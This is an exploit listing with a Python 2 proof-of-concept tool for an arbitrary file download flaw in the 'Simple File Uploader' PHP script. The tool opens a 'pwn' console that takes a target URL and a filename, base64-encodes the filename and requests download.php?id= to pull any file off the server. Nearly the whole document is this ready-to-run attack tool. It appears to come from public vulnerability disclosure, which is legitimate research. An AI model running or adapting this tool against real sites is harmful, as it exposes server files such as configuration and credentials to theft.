# Exploit Title: Simple File Uploader - Arbitrary File Download 
# Date: 27/04/2017
# Exploit Author: Daniel Godoy
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/simple-file-uploader-explorer-and-manager-php-based-secured-file-manager/18393053
# Tested on: GNU/Linux
# GREETZ: Rodrigo MouriA+-o, Rodrigo Avila, #RemoteExecution Team
 
 
 
 
POC
 
#!/usr/bin/env python
#https://pastebin.com/HeT7RuRU
import os,re,requests,time,base64
os.system('clear') 
 
BLUE = '\033[94m'
RED = '\033[91m'
GREEN = '\033[32m'
CYAN = "\033[96m"
WHITE = "\033[97m"
YELLOW = "\033[93m"
MAGENTA = "\033[95m"
GREY = "\033[90m"
DEFAULT = "\033[0m"
 
def banner():
    print WHITE+""
    print "                                              ##          ## "
    print "                                                ##      ##    "    
    print "                                              ############## "
    print "                                            ####  ######  #### "
    print "                                          ###################### "
    print "                                          ##  ##############  ##     "
    print "                                          ##  ##          ##  ## "
    print "                                                ####  ####"
    print ""
 
def details():
    print WHITE+"                              =[" + YELLOW + "Simple File Uploader Download Tool v1.0.0 "
    print ""
 
def core_commands():
    os.system('clear')
    print WHITE+'''Core Commands\n===============\n
Command\t\t\tDescription\n-------\t\t\t-----------\n
?\t\t\tHelp menu
quit\t\t\tExit the console
info\t\t\tDisplay information
download\t\t\tExploit Vulnerability
 
    '''
 
def about():
    os.system('clear')
    print WHITE+'''Simple File Uploader Download Tool v1.0.0 \n===============\n
Author\t\t\tDescription\n-------\t\t\t-----------\n
Daniel Godoy\t\thttps://www.exploit-db.com/author/?a=3146
    '''
 
def download():
    other = 'a'
    while other != 'n':
            urltarget = str(raw_input(WHITE+'Target: '))
            filename =  str(raw_input(WHITE+'FileName: '))
            filename =  base64.b64encode(filename)
            print RED+"[x]Sending Attack: "+WHITE+urltarget+'download.php?id='+filename
            final = urltarget+'download.php?id='+filename
            r = requests.get(final)
            print r.text
            other = str(raw_input(WHITE+'Test other file? y/n: '))
            if other == "n":
                print "Type quit to exit. Bye!"
 
 
 
banner()
details()
 
option='0'
while option != 0:
    option = (raw_input(RED+"pwn" + WHITE +" > "))
    if option == "quit":
        os.system('clear')
        option = 0
    elif option == "?":
        core_commands()
    elif option == "help":
        core_commands()
    elif option == "about":
        about()
    elif option == "download":
        download()
    elif option == "info":
        about()
    else:
        print "Not a valid option! Need help? Press ? to display core commands " +GREEN